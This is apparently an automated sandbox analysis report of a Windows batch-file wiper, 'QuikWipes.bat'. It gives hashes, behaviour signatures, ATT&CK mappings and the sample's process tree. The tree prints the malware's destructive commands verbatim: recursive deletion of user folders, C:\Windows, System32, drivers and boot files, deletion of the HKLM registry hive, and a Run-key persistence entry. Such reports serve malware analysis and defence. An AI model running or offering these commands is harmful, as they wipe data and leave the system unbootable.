Analysis

  • max time kernel
    261s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-05-2024 04:25

General

  • Target

    QuikWipes.bat

  • Size

    47KB

  • MD5

    4159f980bd03895ac2431f5264cbe0cf

  • SHA1

    6b197f4f4ccf3f201c1ecc0ea145e79895acfb9f

  • SHA256

    6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2

  • SHA512

    181bf22d9446b2904dfc2cd8c76f66a43b99650d7c2db180646f00126838ba0c58afc849572e65eb613ba7f37df58a17d3a85b4742a14b7bde0e7135a50af0d8

  • SSDEEP

    192:a111111111111111111111111111111111111111111111111111111111111111:y

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs
  • Modifies firewall policy service 2 TTPs 36 IoCs
  • Modifies security service 2 TTPs 18 IoCs
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Installed Components in the registry 2 TTPs 52 IoCs
  • Registers new Print Monitor 2 TTPs 12 IoCs
  • Sets file execution options in registry 2 TTPs 42 IoCs
  • Modifies system executable filetype association 2 TTPs 45 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 64 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 9 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Maps connected drives based on registry 3 TTPs 3 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 64 IoCs
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
      2⤵
      • Adds Run key to start application
      PID:2936
    • C:\Windows\system32\cmd.exe
      cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*
      2⤵
        PID:2468
      • C:\Windows\system32\cmd.exe
        cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*
        2⤵
          PID:2216
        • C:\Windows\system32\cmd.exe
          cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*
          2⤵
            PID:2492
            • C:\Windows\explorer.exe
              explorer.exe
              3⤵
                PID:600
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im cmd.exe
                3⤵
                • Kills process with taskkill
                PID:2044
              • C:\Windows\explorer.exe
                explorer.exe
                3⤵
                  PID:668
                • C:\Windows\System32\taskkill.exe
                  taskkill /f /im cmd.exe
                  3⤵
                  • Kills process with taskkill
                  PID:2800
              • C:\Windows\system32\cmd.exe
                cmd.exe /k del /q /f /s C:\Users\Admin\Music\*
                2⤵
                  PID:2628
                • C:\Windows\system32\cmd.exe
                  cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*
                  2⤵
                    PID:2632
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone
                    2⤵
                      PID:2668
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /k RMDIR C:\Windows
                      2⤵
                        PID:2872
                      • C:\Windows\system32\taskkill.exe
                        TASKKILL /F /IM EXPLORER.EXE
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2880
                      • C:\Windows\system32\reg.exe
                        reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
                        2⤵
                        • Adds Run key to start application
                        PID:2604
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /k RMDIR C:\Windows
                        2⤵
                          PID:2612
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned
                          2⤵
                            PID:2704
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
                            2⤵
                              PID:2728
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark
                              2⤵
                                PID:1600
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /k del /q /f /s C:\Windows\*
                                2⤵
                                • Drops file in Windows directory
                                PID:2712
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /k del /q /f /s C:\Windows\System32\*
                                2⤵
                                • Drops file in System32 directory
                                PID:2092
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
                                2⤵
                                  PID:1664
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /k del /q /f /s C:\WindowsBoot\*
                                  2⤵
                                    PID:2744
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe
                                    2⤵
                                      PID:1716
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*
                                      2⤵
                                        PID:1556
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /k RMDIR C:\Windows\System32\BCD
                                        2⤵
                                          PID:500
                                        • C:\Windows\system32\reg.exe
                                          REG DELETE HKLM /f
                                          2⤵
                                          • Adds autorun key to be loaded by Explorer.exe on startup
                                          • Modifies firewall policy service
                                          • Modifies security service
                                          • Manipulates Digital Signatures
                                          • Modifies Installed Components in the registry
                                          • Registers new Print Monitor
                                          • Sets file execution options in registry
                                          • Modifies system executable filetype association
                                          • Registers COM server for autorun
                                          • Adds Run key to start application
                                          • Installs/modifies Browser Helper Object
                                          • Maps connected drives based on registry
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          • Modifies Internet Explorer settings
                                          • Modifies registry class
                                          • Modifies registry key
                                          PID:2168
                                        • C:\Windows\system32\cmd.exe
                                          cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*
                                          2⤵
                                            PID:2756
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /k del /q /f /s C:\Windows\*
                                            2⤵
                                              PID:2736

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v13

                                          Persistence

                                          Boot or Logon Autostart Execution

                                          6
                                          T1547

                                          Registry Run Keys / Startup Folder

                                          6
                                          T1547.001

                                          Create or Modify System Process

                                          2
                                          T1543

                                          Windows Service

                                          2
                                          T1543.003

                                          Event Triggered Execution

                                          1
                                          T1546

                                          Change Default File Association

                                          1
                                          T1546.001

                                          Browser Extensions

                                          1
                                          T1176

                                          Privilege Escalation

                                          Boot or Logon Autostart Execution

                                          6
                                          T1547

                                          Registry Run Keys / Startup Folder

                                          6
                                          T1547.001

                                          Create or Modify System Process

                                          2
                                          T1543

                                          Windows Service

                                          2
                                          T1543.003

                                          Event Triggered Execution

                                          1
                                          T1546

                                          Change Default File Association

                                          1
                                          T1546.001

                                          Defense Evasion

                                          Modify Registry

                                          11
                                          T1112

                                          Subvert Trust Controls

                                          1
                                          T1553

                                          SIP and Trust Provider Hijacking

                                          1
                                          T1553.003

                                          Credential Access

                                          Unsecured Credentials

                                          1
                                          T1552

                                          Credentials In Files

                                          1
                                          T1552.001

                                          Discovery

                                          Query Registry

                                          4
                                          T1012

                                          Peripheral Device Discovery

                                          1
                                          T1120

                                          System Information Discovery

                                          3
                                          T1082

                                          Collection

                                          Data from Local System

                                          1
                                          T1005

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\21241256387603191375029289893030431015.FUCKYOULMAO
                                            Filesize

                                            27B

                                            MD5

                                            9644e3ba2ce9ddbf0d46353cae08a3d9

                                            SHA1

                                            95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb

                                            SHA256

                                            7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0

                                            SHA512

                                            1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a

                                          • C:\Users\Admin\Desktop\HACKER3263090441406188493831651513646205699765139263210431490730429291.txt
                                            Filesize

                                            8B

                                            MD5

                                            a911b36535d43a8a9cd54b028ee92236

                                            SHA1

                                            74a5c2013b757dee646e9a2b480a1447fd96d1b3

                                            SHA256

                                            387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701

                                            SHA512

                                            61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3